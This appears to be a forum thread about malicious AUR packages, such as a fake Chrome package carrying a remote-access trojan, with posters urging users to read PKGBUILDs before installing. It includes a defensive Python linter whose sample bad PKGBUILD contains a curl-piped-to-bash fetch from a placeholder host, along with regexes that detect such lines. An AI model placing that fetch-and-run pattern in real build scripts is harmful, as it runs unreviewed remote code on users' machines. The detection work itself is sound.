Malware RAT, Github AUR question?

In that case, EndeavourOS - or most likely any distro based on Arch - is not the best choice for those users.

Arch’s principles directly contradict this “it should just work without needing to understand how it works” concept:

Whereas many GNU/Linux distributions attempt to be more user-friendly, Arch Linux has always been, and shall always remain user-centric:

  • The distribution is intended to fill the needs of those contributing to it, rather than trying to appeal to as many users as possible.
  • It is targeted at the proficient GNU/Linux user, or anyone with a do-it-yourself attitude who is willing to read the documentation, and solve their own problems.

Also:

Arch ships the configuration files provided by upstream with changes limited to distribution-specific issues like adjusting the system file paths. It does not add automation features such as enabling a service simply because the package was installed.

(Source: https://wiki.archlinux.org/title/Arch_Linux#)

Manjaro attempts to alleviate update issues by delaying and testing package updates for weeks, delivering them in a large update bundle, yet manual intervention by the user is still required periodically.

EndeavourOS, on the other hand, clearly states that they “provide a basic system that is close to Arch Linux” - and what you’re describing is not close to Arch at all.

6 Likes

Re: Fake Chrome Package RAT

Another attack on AUR :sob:

No licence, no checksum, curl is a dodgy link, no votes or maintainer info etc. :scream:

Something ought to be done, else people will move away from Arch Linux derivatives.

Think it is time we all put on our tin foil hat :grinning_face:

2 Likes

Something was done they were discovered and removed. What else should we do?

How about accepting responsibility for one’s own stuff. I mean a few moments of reading would have set off some red flags. As already stated before, Arch is really not meant for the “NEWBIE”, but for those willing to do the WORK.

6 Likes

I don’t think anyone will move away from Arch due to this. The risks of using the AUR have always been made clear by the Arch team.

And checking for URLs in the script like this is no different from, on Windows, making sure you browse to a legitimate website URL to download and install an exe file. Flatpaks can have the same vulnerability to this too, as anyone can create and upload those, and I would advise caution with any unofficial flatpak.

I would say the main issue is the mindset when installing programs: many people will find a file online and run it without thought, which is a risk.
The AUR is safe due to its transparency: you can see these instructions in advance, check for changes, the uploader, verify that the github repository used for the package is legitimate, the commands used, etc.

Sure there are ways the AUR could potentially be improved, but these checks by the user will protect anyone in general with programs on the internet.

3 Likes
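The red flags listed in the two posts above (no licence, no checksum, a curl to an unfamiliar link inside the PKGBUILD, a source host that does not match the upstream url) are all visible in the PKGBUILD text before anything is built. The following script is an added example written for this thread, not code from any of the posters, EndeavourOS, or the AUR tooling: it runs a handful of those checks offline over a constructed sample PKGBUILD. The package names, hosts and the KNOWN_HOSTS list are assumptions for the illustration, and the checks are heuristics, not a substitute for reading the file yourself.

```python
"""Offline red-flag checks for an AUR PKGBUILD (added example, heuristic only)."""
import re
import shlex
from urllib.parse import urlparse

# Assumption for the example: hosts a reviewer would usually recognise as upstream hosting.
KNOWN_HOSTS = {"github.com", "gitlab.com", "codeberg.org", "sourceforge.net",
               "pypi.org", "files.pythonhosted.org", "dl.google.com"}
CHECKSUM_ARRAYS = ("md5sums", "sha1sums", "sha256sums", "sha512sums", "b2sums", "cksums")
PACKAGING_FUNCS = ("prepare", "build", "check", "package")

# A download piped straight into a shell: the curl trick the thread is about.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
NET_TOOL = re.compile(r"\b(?:curl|wget|git\s+clone)\b")


def bash_array(text, name):
    """Elements of a `name=( ... )` bash array, or None if the array is absent."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    return shlex.split(m.group(1), comments=True) if m else None


def scalar(text, name):
    """Value of a `name=value` assignment with quotes stripped, or None."""
    m = re.search(rf"^{name}=(.+)$", text, re.M)
    return shlex.split(m.group(1))[0] if m else None


def functions(text):
    """Map function name -> body for `name() { ... }` blocks closed by a brace at column 0."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"^(\w+)\s*\(\)\s*\{\n(.*?)^\}", text, re.S | re.M)}


def host_of(src):
    """Host of a source=() entry; handles `file::url` and `git+url` forms, None for local files."""
    url = src.split("::", 1)[1] if "::" in src else src
    url = url.split("+", 1)[1] if url.startswith("git+") else url
    return urlparse(url).netloc.lower() if "://" in url else None


def lint_pkgbuild(text):
    """Return a list of red-flag strings; an empty list means nothing was caught."""
    flags = []
    if not bash_array(text, "license"):
        flags.append("no license declared")

    sources = bash_array(text, "source") or []
    sums = None
    for name in CHECKSUM_ARRAYS:
        sums = bash_array(text, name)
        if sums is not None:
            break
    if sources and sums is None:
        flags.append("no checksum array for source=()")
    elif sums is not None:
        for i, s in enumerate(sums):
            if s.upper() == "SKIP":
                src = sources[i] if i < len(sources) else "?"
                flags.append(f"checksum SKIP for source #{i}: {src}")

    # Sources should come from the project's own url= host or a recognised code host.
    upstream = urlparse(scalar(text, "url") or "").netloc.lower() or None
    for src in sources:
        h = host_of(src)
        if h and h not in KNOWN_HOSTS and h != upstream:
            flags.append(f"source pulled from unfamiliar host {h} (url= says {upstream})")

    # makepkg expects every download in source=(); a fetch inside a function bypasses checksums.
    for name, body in functions(text).items():
        if name not in PACKAGING_FUNCS:
            continue
        if PIPE_TO_SHELL.search(body):
            flags.append(f"{name}() downloads a remote script and pipes it into a shell")
        elif NET_TOOL.search(body):
            flags.append(f"{name}() fetches from the network instead of using source=()")
    return flags


# Constructed sample in the spirit of the fake-browser package discussed; not the real AUR entry.
SUSPICIOUS_PKGBUILD = """\
pkgname=fancy-browser-bin
pkgver=1.0
pkgrel=1
pkgdesc="Fast web browser (binary)"
arch=('x86_64')
url="https://www.example-browser.org"
source=("https://cdn.example.invalid/fancy-browser-1.0.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir"
  curl -fsSL https://cdn.example.invalid/setup.sh | bash
  install -Dm755 fancy-browser "$pkgdir/usr/bin/fancy-browser"
}
"""

# Constructed well-formed sample: licence, pinned checksum, source matching url=.
CLEAN_PKGBUILD = """\
pkgname=hello-tool
pkgver=2.3.1
pkgrel=1
pkgdesc="Example CLI tool"
arch=('x86_64')
url="https://github.com/example/hello-tool"
license=('MIT')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/hello-tool/archive/v$pkgver.tar.gz")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

if __name__ == "__main__":
    for label, pb in (("suspicious", SUSPICIOUS_PKGBUILD), ("clean", CLEAN_PKGBUILD)):
        print(f"{label}: {lint_pkgbuild(pb) or ['no red flags']}")
```

To use it on a real package, feed `lint_pkgbuild()` the text of the PKGBUILD that yay or paru shows you before building (or the one fetched from the AUR page); a clean result still means you should read the file, since a malicious build can hide a fetch behind a variable or a helper script in the source tarball that this regex pass will not see.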

Old news.

1 Like

Quite right, the maintainer wiki page is very clear too.

Thanks :folded_hands:

1 Like
3 Likes

Very well done video. Newbs, and maybe even some intermediate users, need to view this. While much of the video is common sense, as we all know, common sense is not necessarily all that common.

2 Likes

@koderOSS If you were wondering why I said that, there’s a post from 8 days ago that already mentioned it and one of the replies shared the same link as you just did again in this topic.

2 Likes

I think only the nOObs… let them go. It’s not supposed to be safe for toddlers - I like it live and dangerous.

This article seems slightly flawed - unless they can verify whence the upvotes came: “Still, it did get a few upvotes, which suggests at least some users ended up installing it.”…

Actually, it seems more likely that the uploader has a couple of accounts or buddies who can upvote for them - as their other attempts to throw this exact same curl trick into a pkgbuild also came with 6 upvotes.

As before, using Paru or Yay - it’s trivial to check out the DETAILS, and follow the link to the AUR page where you can fully read, select/search links, and investigate the pkgbuild.

5 Likes